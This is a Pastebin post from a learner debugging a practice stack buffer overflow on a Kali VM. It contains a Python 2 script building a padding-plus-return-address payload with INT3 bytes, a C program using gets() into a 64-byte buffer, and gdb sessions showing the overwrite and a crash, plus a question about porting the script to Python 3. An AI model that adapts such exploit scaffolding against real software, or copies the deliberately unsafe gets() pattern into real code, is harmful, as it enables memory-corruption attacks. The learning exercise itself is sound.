API tools faq
paste
Advertisement
Guest User

Live Overlow Doubt

a guest
Jul 7th, 2023
114
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.34 KB | None | 0 0
raw download clone embed print report
  1. All files used and their contents:
  2. -- exploit_shell.py:
  3. import struct
  4.  
  5. padding = "A" * 72
  6. eip = struct.pack("Q", 0x7fffffffe248)
  7. payload = "\xCC" * 4
  8.  
  9. print padding + eip + payload
  10.  
  11. -- python2 exploit_shell.py:
  12. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAH��������
  13.  
  14. -- shell_exploit.c = shell_explot
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <unistd.h>
  18. #include <string.h>
  19.  
  20. int main(int argc, char *argv[])
  21. {
  22. char buffer[64];
  23. gets(buffer);
  24. }
  25.  
  26. Name: Intel Core i7 640M Inside
  27. Codename: Arrandale
  28. Package: Socket 989 rPGA
  29.  
  30. I'm not sure if it's relevant, but I'm not exploiting on Protostar, I'm on a Kali VM.
  31. The provided Python 2 payload can be transcribed to Python 3? How?
  32.  
  33.  
  34. DEBUG WITHOUT RUN THE PYTHON STDIN PAYLOAD:
  35. ┌──(root㉿kali)-[/home/kali]
  36. └─# gdb shell_exploit
  37. GNU gdb (Debian 13.2-1) 13.2
  38. Copyright (C) 2023 Free Software Foundation, Inc.
  39. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
  40. This is free software: you are free to change and redistribute it.
  41. There is NO WARRANTY, to the extent permitted by law.
  42. Type "show copying" and "show warranty" for details.
  43. This GDB was configured as "x86_64-linux-gnu".
  44. Type "show configuration" for configuration details.
  45. For bug reporting instructions, please see:
  46. <https://www.gnu.org/software/gdb/bugs/>.
  47. Find the GDB manual and other documentation resources online at:
  48. <http://www.gnu.org/software/gdb/documentation/>.
  49.  
  50. For help, type "help".
  51. Type "apropos word" to search for commands related to "word"...
  52. Reading symbols from shell_exploit...
  53. (No debugging symbols found in shell_exploit)
  54. (gdb) set disassembly-flavor intel
  55. (gdb) break *main
  56. Breakpoint 1 at 0x1139
  57. (gdb) define hook-stop
  58. Type commands for definition of "hook-stop".
  59. End with a line saying just "end".
  60. >x/1i $rip
  61. >x/8wx $rsp
  62. >end
  63. (gdb) run
  64. Starting program: /home/kali/shell_exploit
  65. [Thread debugging using libthread_db enabled]
  66. Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
  67. => 0x555555555139 <main>: push rbp
  68. 0x7fffffffe248: 0xf7df218a 0x00007fff 0x00000000 0x00000000
  69. 0x7fffffffe258: 0x55555139 0x00005555 0x00000000 0x00000001
  70.  
  71. Breakpoint 1, 0x0000555555555139 in main ()
  72. (gdb) disassemble
  73. Dump of assembler code for function main:
  74. => 0x0000555555555139 <+0>: push rbp
  75. 0x000055555555513a <+1>: mov rbp,rsp
  76. 0x000055555555513d <+4>: sub rsp,0x50
  77. 0x0000555555555141 <+8>: mov DWORD PTR [rbp-0x44],edi
  78. 0x0000555555555144 <+11>: mov QWORD PTR [rbp-0x50],rsi
  79. 0x0000555555555148 <+15>: lea rax,[rbp-0x40]
  80. 0x000055555555514c <+19>: mov rdi,rax
  81. 0x000055555555514f <+22>: mov eax,0x0
  82. 0x0000555555555154 <+27>: call 0x555555555030 <gets@plt>
  83. 0x0000555555555159 <+32>: mov eax,0x0
  84. 0x000055555555515e <+37>: leave
  85. 0x000055555555515f <+38>: ret
  86. End of assembler dump.
  87. (gdb) break *0x000055555555515f
  88. Breakpoint 2 at 0x55555555515f
  89. (gdb) continue
  90. Continuing.
  91. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  92. => 0x55555555515f <main+38>: ret
  93. 0x7fffffffe248: 0x41414141 0x41414141 0x41414141 0x41414141
  94. 0x7fffffffe258: 0x41414141 0x41414141 0x41414141 0x41414141
  95.  
  96. =======================================================================================================================================
  97. =======================================================================================================================================
  98. =======================================================================================================================================
  99. =======================================================================================================================================
  100. =======================================================================================================================================
  101.  
  102. DEBUG RUNNING PYTHON STDIN PAYLOAD:
  103. (gdb) r < /home/kali/pl
  104. The program being debugged has been started already.
  105. Start it from the beginning? (y or n) y
  106. Starting program: /home/kali/shell_exploit < /home/kali/pl
  107. [Thread debugging using libthread_db enabled]
  108. Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
  109. => 0x555555555139 <main>: push rbp
  110. 0x7fffffffe248: 0xf7df218a 0x00007fff 0x00000000 0x00000000
  111. 0x7fffffffe258: 0x55555139 0x00005555 0x00000000 0x00000001
  112.  
  113. Breakpoint 1, 0x0000555555555139 in main ()
  114. (gdb) disassemble
  115. Dump of assembler code for function main:
  116. => 0x0000555555555139 <+0>: push rbp
  117. 0x000055555555513a <+1>: mov rbp,rsp
  118. 0x000055555555513d <+4>: sub rsp,0x50
  119. 0x0000555555555141 <+8>: mov DWORD PTR [rbp-0x44],edi
  120. 0x0000555555555144 <+11>: mov QWORD PTR [rbp-0x50],rsi
  121. 0x0000555555555148 <+15>: lea rax,[rbp-0x40]
  122. 0x000055555555514c <+19>: mov rdi,rax
  123. 0x000055555555514f <+22>: mov eax,0x0
  124. 0x0000555555555154 <+27>: call 0x555555555030 <gets@plt>
  125. 0x0000555555555159 <+32>: mov eax,0x0
  126. 0x000055555555515e <+37>: leave
  127. 0x000055555555515f <+38>: ret
  128. End of assembler dump.
  129. (gdb) continue
  130. Continuing.
  131. => 0x55555555515f <main+38>: ret
  132. 0x7fffffffe248: 0xffffe248 0x00007fff 0xcccccccc 0x00000000
  133. 0x7fffffffe258: 0x55555139 0x00005555 0x00000000 0x00000001
  134.  
  135. Breakpoint 2, 0x000055555555515f in main ()
  136. (gdb) si
  137. => 0x7fffffffe248: rex.W loop 0x7fffffffe24a # This returns different registers on new runs, like add and fsub.
  138. 0x7fffffffe250: 0xcccccccc 0x00000000 0x55555139 0x00005555
  139. 0x7fffffffe260: 0x00000000 0x00000001 0xffffe358 0x00007fff
  140. 0x00007fffffffe248 in ?? ()
  141. (gdb) si
  142.  
  143. Program received signal SIGSEGV, Segmentation fault.
  144. => 0x7fffffffe248: rex.W loop 0x7fffffffe24a
  145. 0x7fffffffe250: 0xcccccccc 0x00000000 0x55555139 0x00005555
  146. 0x7fffffffe260: 0x00000000 0x00000001 0xffffe358 0x00007fff
  147. 0x00007fffffffe248 in ?? ()
  148. (gdb) si
  149.  
  150. Program terminated with signal SIGSEGV, Segmentation fault.
  151. The program no longer exists.
  152. Error while running hook_stop:
  153. No registers.
  154.  
  155.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!